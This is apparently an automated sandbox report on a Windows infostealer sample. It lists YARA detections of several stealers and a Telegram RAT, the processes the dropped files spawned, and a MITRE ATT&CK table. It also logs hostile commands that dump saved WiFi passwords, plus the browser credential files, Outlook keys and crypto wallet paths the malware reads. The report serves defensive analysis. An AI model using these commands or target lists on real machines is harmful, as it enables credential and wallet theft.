Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 4648
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 4648

Source: taskshell.exe, 00000007.00000002.562750581.0000000001370000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.354943209.0000000000F10000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.369857165.0000000000F10000.00000002.00020000.sdmp, taskshell.exe, 0000000C.00000002.562969442.0000000001BD0000.00000002.00020000.sdmp, taskshell.exe, 00000010.00000002.562402848.0000000001010000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: taskshell.exe, 00000007.00000002.562750581.0000000001370000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.354943209.0000000000F10000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.369857165.0000000000F10000.00000002.00020000.sdmp, taskshell.exe, 0000000C.00000002.562969442.0000000001BD0000.00000002.00020000.sdmp, taskshell.exe, 00000010.00000002.562402848.0000000001010000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: taskshell.exe, 00000007.00000002.562750581.0000000001370000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.354943209.0000000000F10000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.369857165.0000000000F10000.00000002.00020000.sdmp, taskshell.exe, 0000000C.00000002.562969442.0000000001BD0000.00000002.00020000.sdmp, taskshell.exe, 00000010.00000002.562402848.0000000001010000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: taskshell.exe, 00000007.00000002.562750581.0000000001370000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.354943209.0000000000F10000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.369857165.0000000000F10000.00000002.00020000.sdmp, taskshell.exe, 0000000C.00000002.562969442.0000000001BD0000.00000002.00020000.sdmp, taskshell.exe, 00000010.00000002.562402848.0000000001010000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,		4_2_00B8AA60
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: GetLocaleInfoA,		6_2_00417A20

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Queries volume information: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Queries volume information: C:\ProgramData\216363876181815\autofill\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Queries volume information: C:\ProgramData\216363876181815\cc\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Queries volume information: C:\ProgramData\216363876181815\cookies\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Queries volume information: C:\ProgramData\216363876181815\outlook.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Queries volume information: C:\ProgramData\216363876181815\passwords.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Queries volume information: C:\ProgramData\216363876181815\screenshot.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Queries volume information: C:\ProgramData\216363876181815\system.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\dll.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Queries volume information: C:\ProgramData\AMD Driver\taskshell.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chormuim.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Queries volume information: C:\ProgramData\AMD Driver\taskshell.exe VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe	Queries volume information: C:\ProgramData\AMD Driver\taskshell.exe VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

Code function: 4_2_00B86D00 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,

4_2_00B86D00

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

Code function: 4_2_00B7D6E2 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

4_2_00B7D6E2

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

Code function: 4_2_00B8B1E0 GetUserNameA,

4_2_00B8B1E0

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

Code function: 4_2_00B8BEE0 _memset,_memset,GetVersionExA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,FreeLibrary,

4_2_00B8BEE0

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Source: Amcache.hve.29.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.29.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: chormuim.exe, 00000008.00000002.409485125.000000001BA2C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.373931616.000000001BA2C000.00000004.00000010.sdmp	Binary or memory string: r\MsMpeng.exe
Source: chormuim.exe, 00000008.00000000.373226840.000000001B93C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.369711383.0000000000861000.00000004.00000020.sdmp, chormuim.exe, 00000008.00000000.365261466.000000001B93C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.362756816.000000001B900000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000002.409186755.000000001B900000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.366204607.000000001BA2C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.372980265.000000001B900000.00000004.00000010.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.29.dr	Binary or memory string: procexp.exe

Stealing of Sensitive Information:

Yara detected Redline Clipper

Show sources

Source: Yara match	File source: 12.0.taskshell.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.taskshell.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.dll.exe.23a3290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.taskshell.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.taskshell.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.taskshell.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.taskshell.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000000.348480456.0000000000312000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.555072443.0000000000D92000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.555066111.0000000000642000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.330943519.0000000000D92000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.302503110.0000000000642000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.304102093.0000000002341000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.555084428.0000000000312000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dll.exe PID: 5360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: taskshell.exe PID: 6056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: taskshell.exe PID: 3132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: taskshell.exe PID: 6772, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\AMD Driver\taskshell.exe, type: DROPPED

Yara detected Telegram RAT

Show sources

Source: Yara match

File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR

Yara detected Oski Stealer

Show sources

Source: Yara match	File source: 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR
Source: Yara match	File source: 6.2.chormuimii.exe.4b05400.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4af0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.svchoste.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.36b5530.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4ba0f62.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4c0fb62.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.36b5530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4af0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.2406b90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4b5ec00.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.36b6492.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4b5ec00.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.23ad390.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.36b6492.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.2406b90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4ba0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.2397f90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4bb6362.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4ba0f62.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.svchoste.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.2397f90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4c0fb62.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4ba0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12bfa128.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.36cb892.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.301530705.0000000012BE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchoste.exe, type: DROPPED

Yara detected StormKitty Stealer

Show sources

Source: Yara match	File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match

File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	String found in binary or memory: \\Electrum-LTC\\wallets\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	String found in binary or memory: \\ElectronCash\\wallets\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	String found in binary or memory: window-state.json
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	String found in binary or memory: \\jaxx\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	String found in binary or memory: exodus.conf.json
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	String found in binary or memory: \\Exodus\\exodus.wallet\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	String found in binary or memory: info.seco
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	String found in binary or memory: passphrase.json
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	String found in binary or memory: \\Ethereum\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	String found in binary or memory: \\Exodus\\exodus.wallet\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	String found in binary or memory: \\Ethereum\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	String found in binary or memory: default_wallet
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	String found in binary or memory: multidoge.wallet
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	String found in binary or memory: seed.seco
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior

Tries to harvest and steal WLAN passwords

Show sources

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: Yara match	File source: 00000008.00000000.370467159.00000000027FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.406666147.00000000027FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.356149280.00000000027FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR

Remote Access Functionality:

Yara detected Telegram RAT

Show sources

Source: Yara match

File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR

Yara detected Oski Stealer

Show sources

Source: Yara match	File source: 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR
Source: Yara match	File source: 6.2.chormuimii.exe.4b05400.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4af0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.svchoste.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.36b5530.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4ba0f62.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4c0fb62.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.36b5530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4af0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.2406b90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4b5ec00.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.36b6492.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4b5ec00.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.23ad390.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.36b6492.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.2406b90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4ba0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.2397f90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4bb6362.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4ba0f62.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.svchoste.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.2397f90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4c0fb62.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.4ba0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12bfa128.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.chormuimii.exe.36cb892.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.301530705.0000000012BE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchoste.exe, type: DROPPED

Yara detected StormKitty Stealer

Show sources

Source: Yara match	File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match

File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation131	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools121	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Web Service1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API2	Registry Run Keys / Startup Folder1	Process Injection12	Deobfuscate/Decode Files or Information11	Input Capture1	Account Discovery1	Remote Desktop Protocol	Data from Local System3	Exfiltration Over Bluetooth	Data Obfuscation2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
